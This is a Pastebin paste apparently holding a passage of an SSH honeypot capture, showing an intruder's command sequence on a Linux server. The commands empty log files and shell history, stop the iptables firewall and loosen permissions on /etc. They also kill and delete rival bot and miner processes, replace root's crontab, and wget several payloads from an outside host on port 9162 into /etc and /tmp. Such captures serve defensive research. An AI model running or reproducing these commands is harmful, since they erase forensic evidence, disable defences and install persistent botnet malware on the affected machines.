	cd /var/log > alternatives.log 

707
	cd /var/log > boot.log 

708
	cd /var/log > btmp 

709
	cd /var/log > cron 

710
	cd /var/log > cups 

711
	cd /var/log > daemon.log 

712
	cd /var/log > dpkg.log 

713
	cd /var/log > faillog 

714
	cd /var/log > kern.log 

715
	cd /var/log > lastlog

716
	cd /var/log > maillog 

717
	cd /var/log > user.log 

718
	cd /var/log > Xorg.x.log 

719
	cd /var/log > anaconda.log 

720
	cd /var/log > yum.log 

721
	cd /var/log > secure

722
	cd /var/log > wtmp

723
	cd /var/log > utmp 

724
	cd /var/log > messages

725
	cd /var/log > spooler

726
	cd /var/log > sudolog

727
	cd /var/log > aculog

728
	cd /var/log > access-log

729
	cd /root > .bash_history

730
	history -c"

731
2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop

732
	echo "nameserver 8.8.8.8" >> /etc/resolv.conf

733
	echo "nameserver 8.8.4.4" >> /etc/resolv.conf

734
	apt-get -y install wget

735
	yum -y install wget

736
	chmod 7777 / etc

737
	killall -9 .IptabLes

738
	killall -9 nfsd4

739
	killall -9 profild.key

740
	cd /etc;rm -rf dir fake.cfg

741
	killall -9 nfsd

742
	killall -9 DDosl

743
	killall -9 lengchao32

744
	killall -9 b26

745
	killall -9 khelper

746
	killall -9 Bill

747
	killall -9 n26

748
	killall -9 007

749
	killall -9 codelove

750
	killall -9 32

751
	killall -9 m32

752
	killall -9 m64

753
	killall -9 64

754
	killall -9 83BOT 

755
	killall -9 82BOT

756
	killall -9 dos64

757
	killall -9 dos32

758
	killall -9 new6

759
	killall -9 new4

760
	killall -9 node24

761
	killall -9 mimi

762
	killall -9 nodeJR-1

763
	killall -9 freeBSD

764
	killall -9 ksapdd

765
	killall -9 106

766
	killall -9 09

767
	killall -9 xsw 

768
	killall -9 syslogd

769
	killall -9 skysapdd

770
	killall -9 cupsddd

771
	killall -9 ksapd

772
	killall -9 atddd

773
	killall -9 xfsdxd

774
	killall -9 sfewfesfs

775
	killall -9 gfhjrtfyhuf

776
	killall -9 rewgtf3er4t

777
	killall -9 fdsfsfvff

778
	killall -9 smarvtd

779
	killall -9 whitptabil

780
	killall -9 gdmorpen

781
	cd /etc;chattr -i 66

782
	cd /root; chmod 7777 / etc

783
	killall -9 minerd

784
	killall -9 syn

785
	killall -9 joudckfr

786
	killall -9 www

787
	killall -9 log

788
	killall -9 .IptabLes

789
	killall -9 .IptabLex

790
	killall -9 .Mm2

791
	killall -9 acpid

792
	killall -9 m64 

793
	killall -9 ./QQ

794
	killall -9 aabb

795
	killall -9 g3

796
	killall -9 S99local

797
	killall -9 3

798
	killall -9 pm

799
	killall -9 qweasd

800
	killall -9 tangtang

801
	killall -9 imap-login

802
	killall -9 xudp

803
	killall -9 sshpa

804
	killall -9 008

805
	killall -9 txma

806
	killall -9 mrdos64.b00

807
	killall -9 mrdos32.b00

808
	killall -9 kkpklp

809
	killall -9 kiilp

810
	killall -9 xin1

811
	killall -9 jibateng

812
	killall -9 syscore.sh

813
	killall -9 syscore.sh

814
	killall -9 syscore.sh

815
	killall -9 .mimeo 

816
	killall -9 .mimeo

817
	killall -9 .mimeo

818
	killall -9 .mimeop

819
	killall -9 .task1

820
	killall -9 .mimeop

821
	killall -9 .IptabLes

822
	killall -9 .IptabLex

823
	killall -9 .IptabLes

824
	killall -9 .IptabLex

825
	killall -9 .IptabLes

826
	killall -9 .IptabLex

827
	killall -9 .IptabLes

828
	killall -9 .IptabLex

829
	cd /root;rm -rf dir nohup.out

830
	cd /etc;rm -rf dir fake.cfg

831
	cd /etc;rm -rf dir cupsddd.*

832
	cd /etc;rm -rf dir atddd.*

833
	cd /etc;rm -rf dir ksapdd.*

834
	cd /etc;rm -rf dir kysapdd.*

835
	cd /etc;rm -rf dir sksapdd.*

836
	cd /etc;rm -rf dir skysapdd.*

837
	cd /etc;rm -rf dir xfsdxd.*

838
	cd /etc;rm -rf dir fake.cfg

839
	cd /etc;rm -rf dir cupsdd.*

840
	cd /etc;rm -rf dir atdd.*

841
	cd /etc;rm -rf dir ksapd.*

842
	cd /etc;rm -rf dir kysapd.*

843
	cd /etc;rm -rf dir sksapd.*

844
	cd /etc;rm -rf dir skysapd.*

845
	cd /etc;rm -rf dir xfsdx.*

846
	cd /etc;rm -rf dir sfewfesfs

847
	cd /etc;rm -rf dir gfhjrtfyhuf

848
	cd /etc;rm -rf dir rewgtf3er4t

849
	cd /etc;rm -rf dir fdsfsfvff

850
	cd /etc;rm -rf dir smarvtd

851
	cd /etc;rm -rf dir whitptabil

852
	cd /etc;rm -rf dir gdmorpen

853
	cd /etc;rm -rf dir sfewfesfs.*

854
	cd /etc;rm -rf dir gfhjrtfyhuf.*

855
	cd /etc;rm -rf dir rewgtf3er4t.*

856
	cd /etc;rm -rf dir fdsfsfvff.*

857
	cd /etc;rm -rf dir smarvtd.*

858
	cd /etc;rm -rf dir whitptabil.*

859
	cd /etc;rm -rf dir gdmorpen.*

860
	cd /etc;rm -rf dir nhgbhhj.*

861
	cd /tmp;rm -rf dir 1.*

862
	cd /tmp;rm -rf dir 2.*

863
	cd /tmp;rm -rf dir 3.*

864
	cd /tmp;rm -rf dir 4.*

865
	cd /tmp;rm -rf dir 5.*

866
	cd /tmp;rm -rf dir jdhe

867
	cd /tmp;rm -rf dir jdhe.*

868
	cd /var/spool/cron; rm -rf dir root.*

869
	cd /var/spool/cron; rm -rf dir root

870
	cd /var/spool/cron/crontabs; rm -rf dir root.*

871
	cd /var/spool/cron/crontabs; rm -rf dir root

872
	cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root

873
	cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root

874
	yes|mv /tmp/root /var/spool/cron

875
	yes|mv /tmp/root /var/spool/cron/crontabs

876
	cd /tmp;wget -c http://www.frade8c.com:9162/jdhe

877
	cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs

878
	cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf

879
	cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t

880
	cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff

881
	cd /etc;wget -c http://www.frade8c.com:9162/smarvtd

882
	cd /etc;wget -c http://www.frade8c.com:9162/whitptabil

883
	cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen

884
	cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!